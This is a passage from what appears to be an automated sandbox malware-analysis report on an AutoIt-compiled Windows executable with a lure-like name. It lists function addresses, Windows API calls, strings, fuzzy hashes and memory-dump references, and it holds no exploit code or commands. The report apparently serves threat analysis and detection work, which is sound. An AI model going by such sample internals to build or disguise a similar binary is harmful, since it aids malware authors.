                                                                                • Opcode Fuzzy Hash: 87c3a63e4a92e1e7ffa4a897084ce6fd9a02d9b530a45c2d3ac2330f85dcaedd
                                                                                • Instruction Fuzzy Hash: 10A1BF302043499FDB14EF28C841A6AB3A1FF45314F188969B996DB7D6EF70ED19CB42
                                                                                Function 0087CF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0087CF91
                                                                                • __swprintf.LIBCMT ref: 0087D032
                                                                                • _wcscmp.LIBCMT ref: 0087D045
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0087D09A
                                                                                • _wcscmp.LIBCMT ref: 0087D0D6
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 0087D10D
                                                                                • GetDlgCtrlID.USER32(?), ref: 0087D15F
                                                                                • GetWindowRect.USER32(?,?), ref: 0087D195
                                                                                • GetParent.USER32(?), ref: 0087D1B3
                                                                                • ScreenToClient.USER32(00000000), ref: 0087D1BA
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 0087D234
                                                                                • _wcscmp.LIBCMT ref: 0087D248
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0087D26E
                                                                                • _wcscmp.LIBCMT ref: 0087D282
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                • String ID: %s%u
                                                                                • API String ID: 3119225716-679674701
                                                                                • Opcode ID: b9298ce0a5857762225e9f1b8ac85bd576a4d6df6dfda3a6906e5756cc68d327
                                                                                • Instruction ID: 143321a8c02e46f5fab894f1a67e3487e2a7eec661c2ff72dae7361098dfacb1
                                                                                • Opcode Fuzzy Hash: b9298ce0a5857762225e9f1b8ac85bd576a4d6df6dfda3a6906e5756cc68d327
                                                                                • Instruction Fuzzy Hash: C3A1BE71204706ABD714EF64C884FAAF7A8FF44314F008529F99ED3195EB30E946CBA1
                                                                                Function 0087D8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 0087D8EB
                                                                                • _wcscmp.LIBCMT ref: 0087D8FC
                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 0087D924
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 0087D941
                                                                                • _wcscmp.LIBCMT ref: 0087D95F
                                                                                • _wcsstr.LIBCMT ref: 0087D970
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0087D9A8
                                                                                • _wcscmp.LIBCMT ref: 0087D9B8
                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 0087D9DF
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 0087DA28
                                                                                • _wcscmp.LIBCMT ref: 0087DA38
                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 0087DA60
                                                                                • GetWindowRect.USER32(00000004,?), ref: 0087DAC9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                • String ID: @$ThumbnailClass
                                                                                • API String ID: 1788623398-1539354611
                                                                                • Opcode ID: 51c1cd11389eed61330b16e63bdbf9fe7d6b5cee1fe2fd1040fdfe9dee4d2c71
                                                                                • Instruction ID: 493c284807b4c5a47dbade2cce554102de396ef5162babee345588e15bf346d8
                                                                                • Opcode Fuzzy Hash: 51c1cd11389eed61330b16e63bdbf9fe7d6b5cee1fe2fd1040fdfe9dee4d2c71
                                                                                • Instruction Fuzzy Hash: D5818F310083099BDB01DF54C885FAABBF8FF94714F14846AED89DA09ADB30DD46CBA1
                                                                                Function 0087D6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                • API String ID: 1038674560-1810252412
                                                                                • Opcode ID: b887e08d9b87a0feb2698719bc59f6d0790ad2a092d91a6f69b72aa61f609502
                                                                                • Instruction ID: d0cd7fecb56f33b7c0e5fddc326a5965c7a7d94dd9dffaeb107fb79413a8f5ba
                                                                                • Opcode Fuzzy Hash: b887e08d9b87a0feb2698719bc59f6d0790ad2a092d91a6f69b72aa61f609502
                                                                                • Instruction Fuzzy Hash: DE31BC31A4430CE6DB14EB68CD43EAE73B4FF20760F204129F965F11EAEB65EA148613
                                                                                Function 0087EA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 0087EAB0
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0087EAC2
                                                                                • SetWindowTextW.USER32(?,?), ref: 0087EAD9
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0087EAEE
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0087EAF4
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0087EB04
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0087EB0A
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0087EB2B
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0087EB45
                                                                                • GetWindowRect.USER32(?,?), ref: 0087EB4E
                                                                                • SetWindowTextW.USER32(?,?), ref: 0087EBB9
                                                                                • GetDesktopWindow.USER32 ref: 0087EBBF
                                                                                • GetWindowRect.USER32(00000000), ref: 0087EBC6
                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0087EC12
                                                                                • GetClientRect.USER32(?,?), ref: 0087EC1F
                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0087EC44
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0087EC6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                • String ID:
                                                                                • API String ID: 3869813825-0
                                                                                • Opcode ID: 10bc0e5e4ef0266b42ba5ec18185e9c913dd81941d7885b07ea6f347b7123c43
                                                                                • Instruction ID: cd4c6464e6c8dcbda8e37c8c534dea6c4717a1933267e6b44bf9df5be0e17575
                                                                                • Opcode Fuzzy Hash: 10bc0e5e4ef0266b42ba5ec18185e9c913dd81941d7885b07ea6f347b7123c43
                                                                                • Instruction Fuzzy Hash: A5513E71900709AFDB20AFA8CD89E6EBBF5FF08704F004968E596E65A4C774E944CB50
                                                                                Function 008979B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 008979C6
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 008979D1
                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 008979DC
                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 008979E7
                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 008979F2
                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 008979FD
                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00897A08
                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00897A13
                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00897A1E
                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00897A29
                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00897A34
                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00897A3F
                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00897A4A
                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00897A55
                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00897A60
                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00897A6B
                                                                                • GetCursorInfo.USER32(?), ref: 00897A7B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load$Info
                                                                                • String ID:
                                                                                • API String ID: 2577412497-0
                                                                                • Opcode ID: 0be67832ba11560e43273143018f12306b1dc1c682c9be465f9b4723b47a0c6c
                                                                                • Instruction ID: 36acfcb96ddfcdb592c74c2fe201ce29b583eeddd56a31c861e1df5e049eaef4
                                                                                • Opcode Fuzzy Hash: 0be67832ba11560e43273143018f12306b1dc1c682c9be465f9b4723b47a0c6c
                                                                                • Instruction Fuzzy Hash: 0A3113B0D0831A6ADF10AFB68C8995FBFE8FF04750F54453AE50DE7280DA78A5008FA1
                                                                                Function 0084C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0084C8B7,?,00002000,?,?,00000000,?,0084419E,?,?,?,008DDC00), ref: 0085E984
                                                                                  • Part of subcall function 0084660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008453B1,?,?,008461FF,?,00000000,00000001,00000000), ref: 0084662F
                                                                                • __wsplitpath.LIBCMT ref: 0084C93E
                                                                                  • Part of subcall function 00861DFC: __wsplitpath_helper.LIBCMT ref: 00861E3C
                                                                                • _wcscpy.LIBCMT ref: 0084C953
                                                                                • _wcscat.LIBCMT ref: 0084C968
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0084C978
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0084CABE
                                                                                  • Part of subcall function 0084B337: _wcscpy.LIBCMT ref: 0084B36F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                • API String ID: 2258743419-1018226102
                                                                                • Opcode ID: 6c520c193513d9f425af5e9b4212a3cb44419c64f58034ac1645a55611770b1f
                                                                                • Instruction ID: d5cad79b890619d20578526afaa525917c15075f20b031620ee977e480a87557
                                                                                • Opcode Fuzzy Hash: 6c520c193513d9f425af5e9b4212a3cb44419c64f58034ac1645a55611770b1f
                                                                                • Instruction Fuzzy Hash: 2B1237715083459BC724EF28C881AAFBBE9FF99314F44492EF589D3261DB309A49CB53
                                                                                Function 008ACE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 008ACEFB
                                                                                • DestroyWindow.USER32(?,?), ref: 008ACF73
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 008ACFF4
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 008AD016
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008AD025
                                                                                • DestroyWindow.USER32(?), ref: 008AD042
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00840000,00000000), ref: 008AD075
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008AD094
                                                                                • GetDesktopWindow.USER32 ref: 008AD0A9
                                                                                • GetWindowRect.USER32(00000000), ref: 008AD0B0
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 008AD0C2
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 008AD0DA
                                                                                  • Part of subcall function 0085B526: GetWindowLongW.USER32(?,000000EB), ref: 0085B537
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 3877571568-3619404913
                                                                                • Opcode ID: 0c73ed21b4a36c79ee1126a517865e2015f62bededbe709de3d26a4e95a0b38d
                                                                                • Instruction ID: 0a82ac9c086381ca7bad30440ec2b5ab30e8493d5a42326517dd959822b664dd
                                                                                • Opcode Fuzzy Hash: 0c73ed21b4a36c79ee1126a517865e2015f62bededbe709de3d26a4e95a0b38d
                                                                                • Instruction Fuzzy Hash: 2D71A8B0144705AFE720CF28CC84F6677E5FB8A708F084519F986C76A1EB75E942DB22
                                                                                Function 008AF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 008AF37A
                                                                                  • Part of subcall function 008AD7DE: ClientToScreen.USER32(?,?), ref: 008AD807
                                                                                  • Part of subcall function 008AD7DE: GetWindowRect.USER32(?,?), ref: 008AD87D
                                                                                  • Part of subcall function 008AD7DE: PtInRect.USER32(?,?,008AED5A), ref: 008AD88D
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 008AF3E3
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 008AF3EE
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 008AF411
                                                                                • _wcscat.LIBCMT ref: 008AF441
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 008AF458
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 008AF471
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 008AF488
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 008AF4AA
                                                                                • DragFinish.SHELL32(?), ref: 008AF4B1
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 008AF59C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                • API String ID: 169749273-3440237614
                                                                                • Opcode ID: df6c2f8c4f7614fdea4c9e15e056f1c2f78e99b05735e37be6d93a185375afc5
                                                                                • Instruction ID: 02a2248b7686539a3416d89fa73bf7b0919ed5044302ca074af2c0ed1c113c03
                                                                                • Opcode Fuzzy Hash: df6c2f8c4f7614fdea4c9e15e056f1c2f78e99b05735e37be6d93a185375afc5
                                                                                • Instruction Fuzzy Hash: 02614871108304AFD711EF64CC85EABBBF8FF99710F000A2EF695961A1DB709A09CB52
                                                                                Function 0088AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(00000000), ref: 0088AB3D
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0088AB46
                                                                                • VariantClear.OLEAUT32(?), ref: 0088AB52
                                                                                • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0088AC40
                                                                                • __swprintf.LIBCMT ref: 0088AC70
                                                                                • VarR8FromDec.OLEAUT32(?,?), ref: 0088AC9C
                                                                                • VariantInit.OLEAUT32(?), ref: 0088AD4D
                                                                                • SysFreeString.OLEAUT32(00000016), ref: 0088ADDF
                                                                                • VariantClear.OLEAUT32(?), ref: 0088AE35
                                                                                • VariantClear.OLEAUT32(?), ref: 0088AE44
                                                                                • VariantInit.OLEAUT32(00000000), ref: 0088AE80
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                • API String ID: 3730832054-3931177956
                                                                                • Opcode ID: b1b1a9e9d3b0b5d2b3caffaa0864f059a5118771c1565e0ac93857d76dca1177
                                                                                • Instruction ID: beab6346fade79ed85a60fc08a8cecc46a1b383e61c79e9eb66b5b8cfff2fee6
                                                                                • Opcode Fuzzy Hash: b1b1a9e9d3b0b5d2b3caffaa0864f059a5118771c1565e0ac93857d76dca1177
                                                                                • Instruction Fuzzy Hash: 1DD1DF71600609DBEB28BF69C885B6AB7B9FF04710F148466E505DB2C1DB74EC40DBA7
                                                                                Function 008A716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 008A71FC
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008A7247
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 3974292440-4258414348
                                                                                • Opcode ID: e97e1439e7bbf5392099a1755e28276234b5a36ee968f7693f01895d4790cf14
                                                                                • Instruction ID: dc2d3344ee78ad189f43bc12823d32178fb4e9f0a82764071498cbbe06cc9429
                                                                                • Opcode Fuzzy Hash: e97e1439e7bbf5392099a1755e28276234b5a36ee968f7693f01895d4790cf14
                                                                                • Instruction Fuzzy Hash: F1915F302046059BDB14EF28C851A6EB7A1FF55314F00985DFD96DB7A2DB30ED0ADB82
                                                                                Function 008AE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 008AE5AB
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,008A9808,?), ref: 008AE607
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008AE647
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008AE68C
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 008AE6C3
                                                                                • FreeLibrary.KERNEL32(?,00000004,?,?,?,008A9808,?), ref: 008AE6CF
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 008AE6DF
                                                                                • DestroyIcon.USER32(?), ref: 008AE6EE
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 008AE70B
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 008AE717
                                                                                  • Part of subcall function 00860FA7: __wcsicmp_l.LIBCMT ref: 00861030
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 1212759294-1154884017
                                                                                • Opcode ID: c73875f7f99126c3f201e5b9e2b5a322b886a8eaac71d39172b713bd2034e3e6
                                                                                • Instruction ID: 4d65a2fc9f2e9e370058b01168e2edf983f33c97b29b3c794a3ec1cc8912de1a
                                                                                • Opcode Fuzzy Hash: c73875f7f99126c3f201e5b9e2b5a322b886a8eaac71d39172b713bd2034e3e6
                                                                                • Instruction Fuzzy Hash: 7F61E071900319FAEB24EF68CC46FBE7BA8FB19724F104915F911D61D1EB74A980CBA0
                                                                                Function 0088D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0084936C: __swprintf.LIBCMT ref: 008493AB
                                                                                  • Part of subcall function 0084936C: __itow.LIBCMT ref: 008493DF
                                                                                • CharLowerBuffW.USER32(?,?), ref: 0088D292
                                                                                • GetDriveTypeW.KERNEL32 ref: 0088D2DF
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088D327
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088D35E
                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088D38C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
